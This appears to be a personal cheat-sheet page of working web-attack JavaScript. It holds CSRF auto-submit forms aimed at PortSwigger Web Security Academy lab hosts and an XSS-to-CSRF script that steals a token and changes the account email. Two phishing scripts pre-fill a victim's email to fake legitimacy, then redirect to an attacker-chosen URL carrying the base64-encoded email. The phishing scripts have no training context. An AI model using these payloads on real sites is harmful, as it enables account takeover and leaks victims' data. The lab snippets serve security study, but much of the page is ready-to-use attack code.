
Javascript Crafting

PSG CSRF 1 : No Validation

<form method="POST" action="https://0a3700f504731a4780bc0d2500a000f6.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="ttttt@test.com">
</form>
<script>
        document.forms[0].submit();
</script>

PSG CSRF 2 : CSRF request method validation bypass using GET request instead of POST

<form action="https://0a3200e70330e7bb86d263eb00300092.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="wqwqqqqe&#64;dwa&#46;com" />
    <input type="hidden" name="csrf" value="57wADTL15Fs0pWIwqejKzreJVbVp80fO" />
    <input type="submit" value="Submit request" />
</form>
<script>
    document.forms[0].submit();
</script>

XSS to CSRF Changing email

<script>
// Step 1: fetch the account page, which contains the CSRF token in the form
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/my-account', true);
req.send();
function handleResponse() {
    // Step 2: pull the token out of the response body
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    // Step 3: send the change-email POST with the token supplied
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf=' + token + '&email=t3st@test.com');
}
</script>
  1. Go to the account page

  2. Make a POST request to change the email

  3. Remember to supply the necessary parameters (they can be taken from the POST request captured in Burp)

CSRF placing email obtained from parameter and redirecting it to another host

<script>
    function onWindowLoad() {
        // read the email and the redirect target from the page's own query string
        const urlParams = new URLSearchParams(window.location.search);
        const email = urlParams.get('email');
        const destination = urlParams.get('url');
        var xhr = new XMLHttpRequest();
        xhr.open('GET', destination, true);
        xhr.send();
        fetch(destination);
        // show the email in the page so it looks like the user's own account
        var outputCdc = document.getElementById("gf-user");
        outputCdc.innerText = `${email}`;
    }
    window.onload = onWindowLoad;

    function redirected() {
        const urlParams = new URLSearchParams(window.location.search);
        const destination = urlParams.get('url');
        const email = urlParams.get('email');
        // base64-encode the email so it can be passed on in the redirect
        const emailb = btoa(email);
        if (destination) {
            window.location.href = destination + "&key=" + emailb;
        } else {
            window.location.href = 'defaultPage.html';
        }
    }
</script>
  1. Obtain the email and url from the link the victim opened; url is used as the redirect host

  2. Place the value of email into the input box as a placeholder (to trick the victim into thinking it's the legitimate website)

  3. When the victim presses the Proceed button, they are redirected to url + key, where key is their email encoded in base64

CSRF placing email obtained from parameter

<script>
    window.onload = function() {
        // take the base64 email passed on by the previous page and decode it
        const urlParams = new URLSearchParams(window.location.search);
        const emailb = urlParams.get('key');
        const email = atob(emailb);
        // pre-fill the email field and display name so the page looks legitimate
        const inpele2 = document.getElementById('emailkau');
        const inpele3 = document.getElementById('displayName');
        inpele2.value = email;
        inpele3.textContent = email;
    };
</script>
  1. Must have the base64 email (key) of the victim (btoa encodes to base64, atob decodes it)

  2. Pass the value in as the email placeholder to trick the victim


Last updated 1 year ago
